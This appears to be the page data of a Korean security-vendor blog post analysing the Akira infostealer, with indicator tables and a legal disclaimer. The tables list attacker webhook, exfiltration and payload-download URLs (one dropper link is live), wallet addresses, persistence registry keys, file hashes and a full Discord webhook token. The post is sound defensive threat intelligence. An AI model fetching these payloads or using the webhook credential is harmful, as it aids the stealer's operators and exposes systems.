URL",[526,12043,746],{},[1418,12045,4706,12047],{"className":12046,"style":4705},[11128],[1434,12048,12049,4706,12061,4706,12074,4706,12087,4706,12100,4706,12113,4706,12126,4706,12139,4706,12155,4706,12171,4706,12184,4706,12197,4706,12210,4706,12223,4706,12236,4706,12249,4706,12262,4706,12275,4706,12288,4706,12301,4706,12315,4706,12328],{},[1424,12050,4711,12051,4711,12055,4711,12059,4706],{},[1427,12052,12054],{"style":12053},"text-align: left; width: 18%;","범주",[1427,12056,12058],{"style":12057},"text-align: left; width: 52%;","난독화된 URL",[1427,12060,4883],{"style":4876},[1424,12062,4711,12063,4711,12066,4711,12071,4706],{},[1439,12064,12065],{},"기본 인젝션",[1439,12067,12068],{},[578,12069,12070],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/inj[.]php",[1439,12072,12073],{},"최초 공격자 웹훅 엔드포인트",[1424,12075,4711,12076,4711,12079,4711,12084,4706],{"style":4732},[1439,12077,12078],{},"대체 인젝션",[1439,12080,12081],{},[578,12082,12083],{},"https[:]//cosmoplanets[.]net/.well-known/pki-validation/inj[.]php",[1439,12085,12086],{},"대체 인젝터 엔드포인트",[1424,12088,4711,12089,4711,12092,4711,12097,4706],{},[1439,12090,12091],{},"오류 보고 (TG)",[1439,12093,12094],{},[578,12095,12096],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/link[.]php",[1439,12098,12099],{},"Telegram 오류/로그 보고 URL",[1424,12101,4711,12102,4711,12105,4711,12110,4706],{"style":4732},[1439,12103,12104],{},"오류 보고 (Alt)",[1439,12106,12107],{},[578,12108,12109],{},"https[:]//cosmoplanets[.]net/.well-known/pki-validation/link[.]php",[1439,12111,12112],{},"대체 오류/로그 보고 URL",[1424,12114,4711,12115,4711,12118,4711,12123,4706],{},[1439,12116,12117],{},"배니티 봇 (TG)",[1439,12119,12120],{},[578,12121,12122],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/mumu[.]php",[1439,12124,12125],{},"배니티 주소 알림 엔드포인트",[1424,12127,4711,12128,4711,12131,4711,12136,4706],{"style":4732},[1439,12129,12130],{},"배니티 봇 (Alt)",[1439,12132,12133],{},[578,12134,12135],{},"https[:]//cosmoplanets[.]net/well-known/pki-validation/mumu[.]php",[1439,12137,12138],{},"대체 배니티 알림 엔드포인트",[1424,12140,4711,12141,4711,12144,4711,12149,4706],{},[1439,12142,12143],{},"Exodus 인젝션",[1439,12145,12146],{},[578,12147,12148],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/exodus[.]asar",[1439,12150,12151,12152,12154],{},"Electron ",[578,12153,4607],{}," 앱 모듈",[1424,12156,4711,12157,4711,12160,4711,12165,4706],{"style":4732},[1439,12158,12159],{},"Atomic 인젝션",[1439,12161,12162],{},[578,12163,12164],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/atomic[.]asar",[1439,12166,12151,12167,12170],{},[578,12168,12169],{},"AtomicWallet"," 모듈",[1424,12172,4711,12173,4711,12176,4711,12181,4706],{},[1439,12174,12175],{},"Updater 다운로드",[1439,12177,12178],{},[578,12179,12180],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/Updater[.]exe",[1439,12182,12183],{},"지속성 드로퍼 실행 파일",[1424,12185,4711,12186,4711,12189,4711,12194,4706],{"style":4732},[1439,12187,12188],{},"Gofile API 목록",[1439,12190,12191],{},[578,12192,12193],{},"https[:]//api.gofile[.]io/servers",[1439,12195,12196],{},"최적의 GoFile 업로드 서버 회수",[1424,12198,4711,12199,4711,12202,4711,12207,4706],{},[1439,12200,12201],{},"Discord 토큰 검사",[1439,12203,12204],{},[578,12205,12206],{},"https[:]//discordapp[.]com/api/v9/users/@me",[1439,12208,12209],{},"탈취한 Discord 토큰 검증",[1424,12211,4711,12212,4711,12215,4711,12220,4706],{"style":4732},[1439,12213,12214],{},"Discord 결제 정보",[1439,12216,12217],{},[578,12218,12219],{},"https[:]//discord[.]com/api/users/@me/billing/payment-sources",[1439,12221,12222],{},"결제 수단 회수",[1424,12224,4711,12225,4711,12228,4711,12233,4706],{},[1439,12226,12227],{},"Google OAuth 리플레이",[1439,12229,12230],{},[578,12231,12232],{},"https[:]//accounts[.]google[.]com/oauth/multilogin",[1439,12234,12235],{},"탈취한 Google 세션 토큰 리플레이",[1424,12237,4711,12238,4711,12241,4711,12246,4706],{"style":4732},[1439,12239,12240],{},"IP 검사 (hosting)",[1439,12242,12243],{},[578,12244,12245],{},"http[:]//ip-api[.]com/line/?fields=hosting",[1439,12247,12248],{},"호스팅 환경 탐지",[1424,12250,4711,12251,4711,12254,4711,12259,4706],{},[1439,12252,12253],{},"IP 조회 (geo)",[1439,12255,12256],{},[578,12257,12258],{},"http[:]//ip-api[.]com/json/{ip}",[1439,12260,12261],{},"IP 기반 지오로케이션",[1424,12263,4711,12264,4711,12267,4711,12272,4706],{"style":4732},[1439,12265,12266],{},"퍼블릭 IP 회수",[1439,12268,12269],{},[578,12270,12271],{},"https[:]//api[.]ipify[.]org",[1439,12273,12274],{},"외부 IP 주소 가져오기",[1424,12276,4711,12277,4711,12280,4711,12285,4706],{},[1439,12278,12279],{},"File.io 업로드",[1439,12281,12282],{},[578,12283,12284],{},"https[:]//file[.]io/",[1439,12286,12287],{},"보조 유출 채널",[1424,12289,4711,12290,4711,12293,4711,12298,4706],{"style":4732},[1439,12291,12292],{},"Oshi.at 업로드",[1439,12294,12295],{},[578,12296,12297],{},"http[:]//oshi[.]at/",[1439,12299,12300],{},"3차 유출 채널",[1424,12302,4711,12303,4711,12306,4711,12312,4706],{},[1439,12304,12305],{},"JS 드로퍼 기본",[1439,12307,12308],{},[717,12309,12311],{"href":12310,"target":330},"https://rentry.co/7vzd22fg36hfdd33/raw","https[:]//rentry[.]co/7vzd22fg36hfdd33/raw",[1439,12313,12314],{},"실제 ZIP URL에 대한 원격 참조",[1424,12316,4711,12317,4711,12320,4711,12325,4706],{"style":4732},[1439,12318,12319],{},"JS 드로퍼 폴백 1",[1439,12321,12322],{},[717,12323,12324],{"href":3622,"target":330},"https[:]//cosmicdust[.]zip/.well-known/pki-validation/pyth.zip",[1439,12326,12327],{},"대체 페이로드 ZIP",[1424,12329,4711,12330,4711,12333,4711,12338,4706],{},[1439,12331,12332],{},"JS 드로퍼 폴백 2",[1439,12334,12335],{},[717,12336,12337],{"href":3627,"target":330},"https[:]//cosmoplanets[.]net/well-known/pki-validation/pyth.zip",[1439,12339,12340],{},"보조 폴백 페이로드 ZIP",[853,12342],{"className":12343},[856,857],[740,12345,12347],{"id":12346},"_2-암호화폐-주소","2. 암호화폐 주소",[526,12349,746],{},[1418,12351,4706,12353],{"className":12352,"style":4705},[11128],[1434,12354,12355,4706,12363,4706,12373,4706,12383,4706,12393,4706,12402,4706,12412,4706,12422,4706,12432,4706,12442,4706,12452],{},[1424,12356,4711,12357,4711,12360,4706],{},[1427,12358,12359],{"style":11139},"화폐",[1427,12361,12362],{"style":4876},"주소",[1424,12364,4711,12365,4711,12368,4706],{},[1439,12366,12367],{},"BTC",[1439,12369,12370],{},[578,12371,12372],{},"bc1qnmz2l8lr0yzj9eun48dyds7rlzg6t6hk5vw5zt",[1424,12374,4711,12375,4711,12378,4706],{"style":4732},[1439,12376,12377],{},"ETH",[1439,12379,12380],{},[578,12381,12382],{},"0xa8a2C9e3fbCde807101dBD87aF7b51583f83d1D5",[1424,12384,4711,12385,4711,12388,4706],{},[1439,12386,12387],{},"DOGE",[1439,12389,12390],{},[578,12391,12392],{},"DACeoqWDPmNARSZAeDZPFwqwecbByaksmd",[1424,12394,4711,12395,4711,12398,4706],{"style":4732},[1439,12396,12397],{},"LTC",[1439,12399,12400],{},[578,12401,11170],{},[1424,12403,4711,12404,4711,12407,4706],{},[1439,12405,12406],{},"XMR",[1439,12408,12409],{},[578,12410,12411],{},"4AVdkoC16zwcjxF4q9cXdL2D4vGqC9iPAcQ9gmHzQ7JS1fUUff6Za3D6CKm9MsDrhSDRY9hgeca7yKnMGpaD8dq6Bo3mT7D",[1424,12413,4711,12414,4711,12417,4706],{"style":4732},[1439,12415,12416],{},"BCH",[1439,12418,12419],{},[578,12420,12421],{},"qrfs8ee558t0a2dlp9v6h4qzns5cd6pltqrrn883xs",[1424,12423,4711,12424,4711,12427,4706],{},[1439,12425,12426],{},"DASH",[1439,12428,12429],{},[578,12430,12431],{},"XpeiSH1MfQYeehTfxosYHyTHzbgu2LNsG1",[1424,12433,4711,12434,4711,12437,4706],{"style":4732},[1439,12435,12436],{},"TRX",[1439,12438,12439],{},[578,12440,12441],{},"TFuYQoosCUqbVjibowMqaa3W3h3RtAVDbK",[1424,12443,4711,12444,4711,12447,4706],{},[1439,12445,12446],{},"XRP",[1439,12448,12449],{},[578,12450,12451],{},"r36AwwhUH7BRujevi5mukbDrG46KGbTk8V",[1424,12453,4711,12454,4711,12457,4706],{"style":4732},[1439,12455,12456],{},"XLM",[1439,12458,12459],{},[578,12460,12461],{},"GAEPMD52PX7FYX65AJJLEFZSH3DZSL3DKM2XRXHVJP4CLJFIBKI25C33",[853,12463],{"className":12464},[856,857],[740,12466,12468],{"id":12467},"_3-레지스트리-키-경로","3. 레지스트리 키 / 경로",[526,12470,746],{},[1418,12472,4706,12474],{"className":12473,"style":4705},[11128],[1434,12475,12476,4706,12483,4706,12493,4706,12503,4706,12516],{},[1424,12477,4711,12478,4711,12481,4706],{},[1427,12479,1675],{"style":12480},"text-align: left; width: 60%;",[1427,12482,1212],{"style":4876},[1424,12484,4711,12485,4711,12490,4706],{},[1439,12486,12487],{},[578,12488,12489],{},"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\DriverDesc",[1439,12491,12492],{},"가상 GPU 드라이버 시그니처 검사",[1424,12494,4711,12495,4711,12500,4706],{"style":4732},[1439,12496,12497],{},[578,12498,12499],{},"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\ProviderName",[1439,12501,12502],{},"가상 GPU 제공자 이름 검사",[1424,12504,4711,12505,4711,12513,4706],{},[1439,12506,12507,12510,12511,2040],{},[578,12508,12509],{},"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run"," (값 ",[567,12512,1686],{},[1439,12514,12515],{},"Run 키를 통한 지속성 (Updater.exe)",[1424,12517,4711,12518,4711,12522,4706],{"style":4732},[1439,12519,12520],{},[578,12521,1694],{},[1439,12523,12524],{},"지속성 실행 파일",[853,12526],{"className":12527},[856,857],[740,12529,12531],{"id":12530},"_5-파일-및-해시","5. 파일 및 해시",[526,12533,746],{},[1418,12535,4706,12537],{"className":12536,"style":4705},[11128],[1434,12538,12539,4706,12550,4706,12562,4706,12574,4706,12587,4706,12599,4706,12611,4706,12623,4706,12635,4706,12648,4706,12660,4706,12673,4706,12685],{},[1424,12540,4711,12541,4711,12543,4711,12547,4706],{},[1427,12542,11474],{"style":12053},[1427,12544,12546],{"style":12545},"text-align: left; width: 62%;","SHA256",[1427,12548,12549],{"style":4876},"크기 (바이트)",[1424,12551,4711,12552,4711,12554,4711,12559,4706],{},[1439,12553,1846],{},[1439,12555,12556],{},[578,12557,12558],{},"331A4A4D721A1B5B1BB5E9A5C13462D5CDB16248DEFE0F16BE6E1E57C275E380",[1439,12560,12561],{},"63936274",[1424,12563,4711,12564,4711,12566,4711,12571,4706],{"style":4732},[1439,12565,605],{},[1439,12567,12568],{},[578,12569,12570],{},"C98F0F5B89C6DAC1482286FAA2E33A84230C26EA38DA4E013665582C9A04213B",[1439,12572,12573],{},"162036224",[1424,12575,4711,12576,4711,12579,4711,12584,4706],{},[1439,12577,12578],{},"jscrypter.js",[1439,12580,12581],{},[578,12582,12583],{},"0A47985F8B3716058B0DF6C68EC97D0F1F3CB0F7A31562A819C3E766ED4CDCEF",[1439,12585,12586],{},"1429",[1424,12588,4711,12589,4711,12591,4711,12596,4706],{"style":4732},[1439,12590,2836],{},[1439,12592,12593],{},[578,12594,12595],{},"1E666F3CF6E3DA6EED973E00E81EC721B33B17D4E981CB506F62F349DC1B3343",[1439,12597,12598],{},"30138",[1424,12600,4711,12601,4711,12603,4711,12608,4706],{},[1439,12602,2833],{},[1439,12604,12605],{},[578,12606,12607],{},"E375DE29E23C43627B2894EA01B6B1C7D9B1BD37E7305EEC7185CEE9719924A7",[1439,12609,12610],{},"7155",[1424,12612,4711,12613,4711,12615,4711,12620,4706],{"style":4732},[1439,12614,2761],{},[1439,12616,12617],{},[578,12618,12619],{},"972C634FD0666BCA12A6B7A50E69C32610321E9EC4D28D65734E55437D345CC6",[1439,12621,12622],{},"211",[1424,12624,4711,12625,4711,12627,4711,12632,4706],{},[1439,12626,612],{},[1439,12628,12629],{},[578,12630,12631],{},"850361AF7D6C006900FC638D6ACBD9A6362385BAD0530CFBD52555E6415DB3A4",[1439,12633,12634],{},"205210",[1424,12636,4711,12637,4711,12640,4711,12645,4706],{"style":4732},[1439,12638,12639],{},"exodus.asar",[1439,12641,12642],{},[578,12643,12644],{},"6A3B5D5A6BA5925DF39351830D92A2B5E4720803FE9F8040C3E67C12F668F4EB",[1439,12646,12647],{},"132486332",[1424,12649,4711,12650,4711,12652,4711,12657,4706],{},[1439,12651,1906],{},[1439,12653,12654],{},[578,12655,12656],{},"10E4A6B54CC0CF4D18DDE8B69E0B305ABE487E07ED990C5BFF82CE30B217B910",[1439,12658,12659],{},"28454",[1424,12661,4711,12662,4711,12665,4711,12670,4706],{"style":4732},[1439,12663,12664],{},"download.dat",[1439,12666,12667],{},[578,12668,12669],{},"C49E83A5F154F7E54CA0CE9EECEA066A721966786F2850626252DDA0BE0BF79B",[1439,12671,12672],{},"21142",[1424,12674,4711,12675,4711,12677,4711,12682,4706],{},[1439,12676,2895],{},[1439,12678,12679],{},[578,12680,12681],{},"E6F6AD49076367A58220E48691A34E33C18F0285FD9C50879A9B83A99F840AD7",[1439,12683,12684],{},"32375391",[1424,12686,4711,12687,4711,12689,4711,12694,4706],{"style":4732},[1439,12688,601],{},[1439,12690,12691],{},[578,12692,12693],{},"36C34E39DC7D54C4C97DDEB9B6C7FD429DB26C34D65CCE8BE3523FDFDB7CEBE0",[1439,12695,12696],{},"37652937",[853,12698],{"className":12699},[856,857],[740,12701,12703],{"id":12702},"_5-discord-및-telegram-식별자","5. Discord 및 Telegram 식별자",[526,12705,746],{},[1418,12707,4706,12709],{"className":12708,"style":4705},[11128],[1434,12710,12711,4706,12717,4706,12727,4706,12737],{},[1424,12712,4711,12713,4711,12715,4706],{},[1427,12714,12054],{"style":6325},[1427,12716,1432],{"style":4876},[1424,12718,4711,12719,4711,12722,4706],{},[1439,12720,12721],{},"Discord Webhook ID",[1439,12723,12724],{},[578,12725,12726],{},"1226766972675428372",[1424,12728,4711,12729,4711,12732,4706],{"style":4732},[1439,12730,12731],{},"Discord Webhook Token",[1439,12733,12734],{},[578,12735,12736],{},"BuBywdldEWncg7fbIpEhCROLpkGLkYirOoP2bP-uzzOatDaxSpaWqaLNerun85qCfwNz",[1424,12738,4711,12739,4711,12742,4706],{},[1439,12740,12741],{},"Telegram ID",[1439,12743,12744],{},[578,12745,12746],{},"5035121855",[853,12748],{"className":12749},[856,857],[557,12751,12753],{"id":12752},"_14-akira-stealer-인시던트-되돌아보기-glueckkanja-csoc로-방어-강화하기","14. Akira Stealer 인시던트 되돌아보기: glueckkanja CSOC로 방어 강화하기",[526,12755,562],{},[526,12757,12758],{},"이 블로그 전반에서, 우리는 Akira 인포스틸러의 정교한 성격을 탐구했습니다. 표적화된 자격 증명 탈취, 은밀한 데이터 유출, 그리고 전통적인 방어를 회피하는 지속적인 방법으로 특징지어지는 고급 사이버 위협입니다. 이 멀웨어가 어떻게 작동하는지, 어떤 위험을 초래하는지, 어떤 취약점을 악용하는지 이해하는 것은 견고한 사이버보안 전략을 구축하는 데 결정적입니다.",[526,12760,12761],{},"Akira 인포스틸러는 로그인 자격 증명, 브라우저 세션, 암호화폐 지갑, 메시징 서비스, 개인 또는 조직 파일 같은 민감 데이터를 특히 겨냥합니다. 그 계산적이고 정밀한 방법은 단순한 표준 보안 조치 이상을 요구합니다. 지속적인 모니터링, 심층 포렌식 분석, 선제적 위협 인텔리전스가 필요합니다.",[526,12763,12764],{},"glueckkanja CSOC에서 우리는 깊은 기술적 전문성과 고급 분석 역량을 활용하여 단순한 탐지를 넘어섭니다. 우리의 전문 팀은 전용 CSOC 서버에서 실시간으로 위협을 지속적으로 모니터링하여, Akira 인포스틸러 같은 위협의 즉각적인 식별, 철저한 조사, 효과적인 무력화를 가능하게 합니다.",[526,12766,12767],{},"하지만 우리의 작업은 인시던트 대응에서 멈추지 않습니다. 탐지된 모든 인시던트는 우리의 지식 기반을 풍부하게 하고, 우리의 보안 태세를 강화하며, 미래의 위협보다 여러 걸음 앞서 있도록 보장합니다. glueckkanja CSOC와 함께라면, 여러분은 단순한 보호 이상을 얻습니다. 여러분의 장기적 복원력에 헌신하는 적응적 보안 파트너를 얻습니다.",[526,12769,12770],{},"조직의 디지털 자산을 보호하는 다음 단계를 밟으십시오.",[526,12772,12773],{},"오늘 glueckkanja의 사이버보안 전문가에게 문의하고, 함께 선제적으로 여러분의 미래를 보호합시다.",[526,12775,12776],{},[567,12777,12778],{},"glueckkanja CSOC로 여러분의 방어를 강화하십시오.",[557,12780,12782],{"id":12781},"_15-보안-및-법적-고지-실제-멀웨어-코드-사용","15. 보안 및 법적 고지 – 실제 멀웨어 코드 사용",[526,12784,562],{},[526,12786,12787],{},"이 발행물은 인시던트 대응과 포렌식 조사 중 발견된 실제 악성 소프트웨어에서 파생된 코드 발췌와 행위 분해를 포함한 상세한 기술적 통찰을 담고 있습니다. 이 정보를 공유하는 목적은 엄격히 교육적이며, 전문 방어자들이 실제 위협을 더 효과적으로 이해하고, 탐지하며, 대응하도록 돕기 위한 것입니다. 우리는 선의로, 그리고 더 넓은 보안 커뮤니티에 기여하려는 의도로 이를 발행합니다.",[526,12789,12790],{},"포함된 코드의 일부가 실제 유포 중인 위협 행위자 툴킷과 멀웨어 샘플에서 유래했다는 점에 유의하는 것이 중요합니다. 이 조각들은 우리의 지적 재산이 아니며, 안전하거나, 정제되었거나, 그 외 \"무해한\" 것으로 간주되어서도 안 됩니다. 그러한 코드의 복제나 운영적 사용은 명시적으로 권장하지 않습니다. 독자는 이 자료가 연구 및 인식 제고 기능을 하는 동시에, 과소평가해서는 안 될 위험 프로파일을 본질적으로 지닌다는 점을 이해해야 합니다.",[526,12792,12793],{},"인가된 보안 팀, SOC 부서, 학술 연구자, 멀웨어 실험실 같이 법적으로 허가된 환경에서 활동하는 훈련된 전문가만이 여기 설명된 기법이나 코드를 다루어야 합니다. 모든 실험은 격리된 비운영 시스템에 국한되어야 하며, 관련 법률, 내부 정책, 윤리 기준을 준수해야 합니다.",[526,12795,12796],{},"우리는 복제된 어떤 코드나 동작에 대해서도 지원이나 검증을 제공하지 않습니다. 정확성, 관련성, 완전성에 대한 어떤 보장도 없습니다. 나아가, 우리는 이 콘텐츠를 공격 목적, 무단 레드팀 활동, 상업적 멀웨어 개발, 또는 법적으로 정의된 범위를 벗어난 적대적 테스트에 사용하는 것을 명시적으로 거부합니다. 어떤 오용도 법적 결과를 초래할 수 있습니다. glueckkanja AG는 이 콘텐츠의 사용이나 오해에서 발생하는 직간접적 손해에 대한 모든 책임을 부인합니다.",[526,12798,12799],{},"이 콘텐츠를 계속 읽거나 참조함으로써, 여러분은 위 내용을 인정하고 그 어떤 부분도 불법적이거나 비윤리적인 맥락에서 오용, 복제, 적용하지 않을 것에 동의합니다. 의심스러운 경우, 라이브 코드 분석이나 유사한 기술 자료를 다루기 전에 법무, 컴플라이언스, 데이터 보호 부서와 상의하십시오.",[526,12801,12802],{},"이 발행물은 보증, 지원, 책임 없이 \"있는 그대로\" 제공됩니다.",[12804,12805,12806],"style",{},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html pre.shiki code .sScJk, html code.shiki .sScJk{--shiki-default:#6F42C1;--shiki-dark:#B392F0}html pre.shiki code .sZZnC, html code.shiki .sZZnC{--shiki-default:#032F62;--shiki-dark:#9ECBFF}html pre.shiki code .sj4cs, html code.shiki .sj4cs{--shiki-default:#005CC5;--shiki-dark:#79B8FF}html pre.shiki code .szBVR, html code.shiki .szBVR{--shiki-default:#D73A49;--shiki-dark:#F97583}html pre.shiki code .sVt8B, html code.shiki .sVt8B{--shiki-default:#24292E;--shiki-dark:#E1E4E8}html pre.shiki code .sJ8bj, html code.shiki .sJ8bj{--shiki-default:#6A737D;--shiki-dark:#6A737D}html pre.shiki code .s4XuR, html code.shiki .s4XuR{--shiki-default:#E36209;--shiki-dark:#FFAB70}html pre.shiki code .s9eBZ, html code.shiki .s9eBZ{--shiki-default:#22863A;--shiki-dark:#85E89D}",{"title":530,"searchDepth":531,"depth":531,"links":12808},[12809,12810,12811,12812,12823,12824,12825,12826,12827,12828,12829,12830,12832,12833,12834,12835,12836,12837,12838,12839,12840,12843,12851,12852,12853,12859,12877,12895,12896,12897,12898,12906,12913,12920,12929,12936,12937,12938,12939,12940,12941,12942,12943,12944,12945,12946,12947,12948,12949,12950,12951],{"id":742,"depth":531,"text":743},{"id":792,"depth":531,"text":793},{"id":813,"depth":531,"text":814},{"id":869,"depth":531,"text":870,"children":12813},[12814,12815,12817,12819,12821],{"id":890,"depth":2091,"text":891},{"id":945,"depth":2091,"text":12816},"2.1.2 Updater.exe – 초기 로더",{"id":1052,"depth":2091,"text":12818},"2.1.3 main.exe – 난독화된 NodeJS 페이로드 컨테이너",{"id":1169,"depth":2091,"text":12820},"2.1.4 cmd.exe 및 PowerShell 릴레이",{"id":1279,"depth":2091,"text":12822},"2.1.5 python.exe와 astor.py",{"id":1413,"depth":531,"text":1414},{"id":1502,"depth":531,"text":1503},{"id":1580,"depth":531,"text":1581},{"id":1659,"depth":531,"text":1660},{"id":1729,"depth":531,"text":1730},{"id":1808,"depth":531,"text":1809},{"id":1918,"depth":531,"text":1919},{"id":2035,"depth":531,"text":12831},"4.2 AMSI 우회 기법(클래스: gofor4msi)",{"id":2223,"depth":531,"text":2224},{"id":2343,"depth":531,"text":2344},{"id":2441,"depth":531,"text":2442},{"id":2537,"depth":531,"text":2538},{"id":2611,"depth":531,"text":2612},{"id":2680,"depth":531,"text":2681},{"id":2741,"depth":531,"text":2742},{"id":2881,"depth":531,"text":2882},{"id":2942,"depth":531,"text":2943,"children":12841},[12842],{"id":2954,"depth":2091,"text":2955},{"id":3310,"depth":531,"text":3311,"children":12844},[12845,12846,12847,12848,12849,12850],{"id":3319,"depth":2091,"text":3320},{"id":3433,"depth":2091,"text":3434},{"id":3630,"depth":2091,"text":3631},{"id":3917,"depth":2091,"text":3918},{"id":3997,"depth":2091,"text":3998},{"id":4159,"depth":2091,"text":4160},{"id":4393,"depth":531,"text":4394},{"id":4441,"depth":531,"text":4442},{"id":4453,"depth":531,"text":4454,"children":12854},[12855,12856,12857,12858],{"id":4459,"depth":2091,"text":4460},{"id":4503,"depth":2091,"text":4504},{"id":4563,"depth":2091,"text":4564},{"id":4598,"depth":2091,"text":4599},{"id":4635,"depth":531,"text":12860,"children":12861},"7.3 분석 방해 / 회피(클래스: VmProtect)",[12862,12863,12864,12865,12867,12868,12869,12870,12871,12872,12873,12874,12875,12876],{"id":4644,"depth":2091,"text":4645},{"id":4660,"depth":2091,"text":4661},{"id":4699,"depth":2091,"text":4700},{"id":4791,"depth":2091,"text":12866},"7.3.4 VmProtect 아키텍처",{"id":5144,"depth":2091,"text":5145},{"id":5210,"depth":2091,"text":5211},{"id":5278,"depth":2091,"text":5279},{"id":5342,"depth":2091,"text":5343},{"id":5410,"depth":2091,"text":5411},{"id":5467,"depth":2091,"text":5468},{"id":5565,"depth":2091,"text":5566},{"id":5635,"depth":2091,"text":5636},{"id":6091,"depth":2091,"text":6092},{"id":6137,"depth":2091,"text":6138},{"id":6151,"depth":531,"text":6152,"children":12878},[12879,12880,12882,12884,12886,12888,12890,12892,12894],{"id":6309,"depth":2091,"text":6310},{"id":6418,"depth":2091,"text":12881},"7.4.2 암호 덤퍼(Chromium.GetPasswords)",{"id":6542,"depth":2091,"text":12883},"7.4.3 신용카드 덤퍼(Chromium.GetCreditCards)",{"id":6624,"depth":2091,"text":12885},"7.4.4 쿠키 덤퍼(Chromium.GetCookies)",{"id":6706,"depth":2091,"text":12887},"7.4.5 Google 세션 덤퍼(Chromium.dump_google_sessions)",{"id":6833,"depth":2091,"text":12889},"7.4.6 기록 덤퍼(Chromium.GetHistory)",{"id":6902,"depth":2091,"text":12891},"7.4.7 자동 완성 덤퍼(Chromium.GetAutofills)",{"id":6962,"depth":2091,"text":12893},"7.4.8 Firefox 프로필 그래버(GeckoDriver & grabFirefoxProfiles)",{"id":7041,"depth":2091,"text":7042},{"id":7080,"depth":531,"text":7081},{"id":7413,"depth":531,"text":7414},{"id":7527,"depth":531,"text":7528},{"id":7854,"depth":531,"text":7855,"children":12899},[12900,12901,12902,12903,12904,12905],{"id":7863,"depth":2091,"text":7864},{"id":8015,"depth":2091,"text":8016},{"id":8121,"depth":2091,"text":8122},{"id":8246,"depth":2091,"text":8247},{"id":8314,"depth":2091,"text":8315},{"id":8439,"depth":2091,"text":8440},{"id":8544,"depth":531,"text":12907,"children":12908},"7.9. Discord 및 Telegram 토큰 탈취(클래스: Discord)",[12909,12910,12911,12912],{"id":8558,"depth":2091,"text":8559},{"id":8689,"depth":2091,"text":8690},{"id":8933,"depth":2091,"text":8934},{"id":9014,"depth":2091,"text":9015},{"id":9084,"depth":531,"text":9085,"children":12914},[12915,12917,12918,12919],{"id":9097,"depth":2091,"text":12916},"7.10.1 Data 클래스 초기화",{"id":9194,"depth":2091,"text":9195},{"id":9314,"depth":2091,"text":9315},{"id":9379,"depth":2091,"text":9380},{"id":9456,"depth":531,"text":12921,"children":12922},"7.11 파일 그래버(클래스: Utils.steal_files)",[12923,12924,12925,12926,12927,12928],{"id":9468,"depth":2091,"text":9469},{"id":9539,"depth":2091,"text":9540},{"id":9601,"depth":2091,"text":9602},{"id":9634,"depth":2091,"text":9635},{"id":9663,"depth":2091,"text":9664},{"id":9842,"depth":2091,"text":9843},{"id":9951,"depth":531,"text":9952,"children":12930},[12931,12932,12933,12934,12935],{"id":9960,"depth":2091,"text":9961},{"id":9975,"depth":2091,"text":9976},{"id":10054,"depth":2091,"text":10055},{"id":10203,"depth":2091,"text":10204},{"id":10438,"depth":2091,"text":10439},{"id":10791,"depth":531,"text":10792},{"id":10821,"depth":531,"text":10822},{"id":10941,"depth":531,"text":10942},{"id":11054,"depth":531,"text":11055},{"id":11105,"depth":531,"text":11106},{"id":11283,"depth":531,"text":11284},{"id":11334,"depth":531,"text":11335},{"id":11378,"depth":531,"text":11379},{"id":11418,"depth":531,"text":11419},{"id":11506,"depth":531,"text":514},{"id":11521,"depth":531,"text":11522},{"id":12040,"depth":531,"text":12041},{"id":12346,"depth":531,"text":12347},{"id":12467,"depth":531,"text":12468},{"id":12530,"depth":531,"text":12531},{"id":12702,"depth":531,"text":12703},"post",{"lang":12954,"seoTitle":12955,"titleClass":12956,"date":12957,"categories":12958,"blogtitlepic":12960,"socialimg":12961,"customExcerpt":12962,"keywords":12963,"maxContent":325,"asideNav":12964,"footer":13013,"contactInContent":13014,"published":325},"ko","Akira Stealer: 모듈형 정보 탈취 멀웨어에 대한 기술 분석","h2-font-size","2025-06-16",[12959],"Security","head-quiet-breach.png","/blog/heads/head-quiet-breach.png","Microsoft 365의 Defender 경고 하나에서 시작되었습니다. 멀웨어도, 시그니처도, 패닉도 없었습니다. 소음 속의 작은 속삭임뿐이었습니다. 우리가 밝혀낸 것은 수개월에 걸친 자격 증명 탈취였습니다. 정교하고, 조용하며, 거의 눈에 보이지 않았습니다. 우리 CSOC가 조용한 신호 하나를 전면적인 대응으로 바꾼 방법을 소개합니다. 그리고 고객이 통제권을 잃었다는 사실조차 알기 전에 그 통제권을 되찾아 준 이야기입니다.","Microsoft 365 보안, 자격 증명 탈취 탐지, 인시던트 대응, Microsoft Defender, 매니지드 보안 서비스, 클라우드 보안, 위협 탐지, 사이버 공격 탐지, CSOC, 고급 위협 방어",{"menuItems":12965},[12966,12968,12971,12974,12977,12980,12983,12986,12989,12992,12995,12998,13001,13004,13007,13010],{"href":12967,"text":559},"#프롤로그",{"href":12969,"text":12970},"#_1-초기-이벤트-및-분류-요약","초기 이벤트 및 분류 요약",{"href":12972,"text":12973},"#_2-멀웨어-아키텍처-및-실행-체인-개요","멀웨어 아키텍처 및 실행 체인 개요",{"href":12975,"text":12976},"#_3-심층-분석-updaterexe","심층 분석: Updater.exe",{"href":12978,"text":12979},"#_4-심층-분석-powbat","심층 분석: pow.bat",{"href":12981,"text":12982},"#_5-심층-분석-mainexe-electron-기반-멀웨어-로더","심층 분석: 